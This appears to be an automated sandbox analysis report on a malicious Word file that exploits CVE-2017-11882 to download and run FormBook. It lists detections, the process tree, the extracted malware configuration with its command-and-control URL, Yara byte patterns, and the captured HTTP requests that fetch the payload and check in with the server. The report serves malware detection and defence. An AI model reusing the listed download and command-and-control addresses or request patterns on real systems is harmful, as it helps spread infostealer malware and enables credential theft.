
Analysis Report AWB00028487364 -000487449287.doc

Overview

General Information

Sample Name: AWB00028487364 -000487449287.doc
Analysis ID: 432651
MD5: 1ec3b91ed189962f5dbab025347f11a9
SHA1: 4abe9e2631f5c2ef5e3c979e5845b460e8448658
SHA256: 472ee2b8c300718535b7c997c3a7884c125bb697feb4969a3002355d04e4050c
Tags: doc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1924 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • prosper3512.exe (PID: 2580 cmdline: C:\Users\user\AppData\Roaming\prosper3512.exe MD5: CB4947E5C78ADA624D22C28EE9079871)
      • prosper3512.exe (PID: 2308 cmdline: C:\Users\user\AppData\Roaming\prosper3512.exe MD5: CB4947E5C78ADA624D22C28EE9079871)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • control.exe (PID: 2876 cmdline: C:\Windows\SysWOW64\control.exe MD5: 9130377F87A2153FEAB900A00EA1EBFF)
          • cmd.exe (PID: 2964 cmdline: /c del 'C:\Users\user\AppData\Roaming\prosper3512.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.updatesz.com/hlx/"], "decoy": ["firo.store", "unmeasured-grace.com", "burger-ff.com", "alcargomoversllc.com", "brianratkevich.com", "semugaralara01.net", "ngalvision.com", "texaslearningpods.com", "ontarioboatcharters.com", "kleinrugcleaning.com", "michaelvancebromfield.com", "habitameya.com", "elyoma.com", "worldtvepisode.com", "masatakahorie.com", "jumpinginfo.com", "hfjxhs.com", "bf-swiss.com", "rvingbus.com", "suxfi.com", "schoolcardtrades.com", "motion-airsoft.com", "123netflix.moe", "ic200mdl750.com", "silkensarees.com", "digitalmarketingtraining.xyz", "foypay.com", "eudoraacantik.com", "healthyandwealthie.com", "print-postcards-fast.com", "alpha-psych.com", "merthyrrock.com", "mss52.com", "cddcsw.com", "istanbulbisiklettamircisi.com", "ertugrulbey.net", "katarina-yoga.com", "findholmesinlaurelmaryland.com", "sabciu.net", "shipthuocnhanh24h.com", "veganonthegreens.com", "ailil-alvarez.com", "thefashionszone.com", "geminicomputerofficial.com", "terraveda.net", "ruhstorfer-gruppe.info", "suderstr.com", "yunjichem.com", "priyadubai.com", "sofierceboutique.com", "nealcurtiss.com", "mcgdinner.com", "steplife.info", "pwagih.com", "cpzgzcw.com", "wierzewzwierze.com", "asbestosconsultancyservices.com", "centerstageacademyaz.com", "skip1-dndasasd.com", "successteamrealty.com", "mijninboxe.com", "berkeleyrehab.com", "tfjxw.com", "mcluxuryrentals.com"]}

Yara Overview

Memory Dumps

Columns: Source, Rule, Description, Author, Strings

Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp
Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp
Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Strings:
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp
Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp
Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(19 entries in total; remaining entries not shown)

Unpacked PEs

Columns: Source, Rule, Description, Author, Strings

Source: 5.1.prosper3512.exe.400000.0.unpack
Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 5.1.prosper3512.exe.400000.0.unpack
Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 5.1.prosper3512.exe.400000.0.unpack
Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Strings:
  • 0x175f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1770c:$sqlite3step: 68 34 1C 7B E1
  • 0x17628:$sqlite3text: 68 38 2A 90 C5
  • 0x1774d:$sqlite3text: 68 38 2A 90 C5
  • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17763:$sqlite3blob: 68 53 D8 7F 8C

Source: 4.2.prosper3512.exe.5c0000.3.raw.unpack
Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 4.2.prosper3512.exe.5c0000.3.raw.unpack
Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(13 entries in total; remaining entries not shown)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1296, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Roaming\prosper3512.exe, CommandLine: C:\Users\user\AppData\Roaming\prosper3512.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\prosper3512.exe, NewProcessName: C:\Users\user\AppData\Roaming\prosper3512.exe, OriginalFileName: C:\Users\user\AppData\Roaming\prosper3512.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1296, ProcessCommandLine: C:\Users\user\AppData\Roaming\prosper3512.exe, ProcessId: 2580

Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.updatesz.com/hlx/"], "decoy": ["firo.store", "unmeasured-grace.com", "burger-ff.com", "alcargomoversllc.com", "brianratkevich.com", "semugaralara01.net", "ngalvision.com", "texaslearningpods.com", "ontarioboatcharters.com", "kleinrugcleaning.com", "michaelvancebromfield.com", "habitameya.com", "elyoma.com", "worldtvepisode.com", "masatakahorie.com", "jumpinginfo.com", "hfjxhs.com", "bf-swiss.com", "rvingbus.com", "suxfi.com", "schoolcardtrades.com", "motion-airsoft.com", "123netflix.moe", "ic200mdl750.com", "silkensarees.com", "digitalmarketingtraining.xyz", "foypay.com", "eudoraacantik.com", "healthyandwealthie.com", "print-postcards-fast.com", "alpha-psych.com", "merthyrrock.com", "mss52.com", "cddcsw.com", "istanbulbisiklettamircisi.com", "ertugrulbey.net", "katarina-yoga.com", "findholmesinlaurelmaryland.com", "sabciu.net", "shipthuocnhanh24h.com", "veganonthegreens.com", "ailil-alvarez.com", "thefashionszone.com", "geminicomputerofficial.com", "terraveda.net", "ruhstorfer-gruppe.info", "suderstr.com", "yunjichem.com", "priyadubai.com", "sofierceboutique.com", "nealcurtiss.com", "mcgdinner.com", "steplife.info", "pwagih.com", "cpzgzcw.com", "wierzewzwierze.com", "asbestosconsultancyservices.com", "centerstageacademyaz.com", "skip1-dndasasd.com", "successteamrealty.com", "mijninboxe.com", "berkeleyrehab.com", "tfjxw.com", "mcluxuryrentals.com"]}
Multi AV Scanner detection for domain / URL
Source: carbinz.ga | Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe | ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Roaming\prosper3512.exe | ReversingLabs: Detection: 29%
Multi AV Scanner detection for submitted file
Source: AWB00028487364 -000487449287.doc | Virustotal: Detection: 30%
Source: AWB00028487364 -000487449287.doc | ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe | Joe Sandbox ML: detected
Source: 7.2.control.exe.540000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 5.1.prosper3512.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.control.exe.6523a8.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.control.exe.262f834.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.prosper3512.exe.5c0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.prosper3512.exe.25d0000.4.unpack | Avira: Label: TR/Dropper.Gen
Source: 7.0.control.exe.540000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 5.2.prosper3512.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.prosper3512.exe.5772f0.1.unpack | Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\prosper3512.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\prosper3512.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: control.pdb source: prosper3512.exe, 00000005.00000002.2161047625.00000000025D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: prosper3512.exe, control.exe
Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 4_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 4_2_0040263E FindFirstFileA,
Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi
Source: global traffic | DNS query: name: carbinz.ga
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 142.250.180.211:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 142.250.180.211:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 142.250.180.211:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.updatesz.com/hlx/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 10 Jun 2021 14:22:07 GMTContent-Type: application/x-msdownloadContent-Length: 245650Last-Modified: Wed, 09 Jun 2021 23:32:39 GMTConnection: keep-aliveETag: "60c14f97-3bf92"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U HTTP/1.1 | Host: www.centerstageacademyaz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 185.239.243.112 185.239.243.112
Source: Joe Sandbox View | ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: global traffic | HTTP traffic detected: GET /modex/prosperx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: carbinz.ga | Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55594574-8E09-401E-A760-1A1C7B299BE3}.tmp
Source: global traffic | HTTP traffic detected: GET /modex/prosperx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: carbinz.ga | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U HTTP/1.1 | Host: www.centerstageacademyaz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: carbinz.ga
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
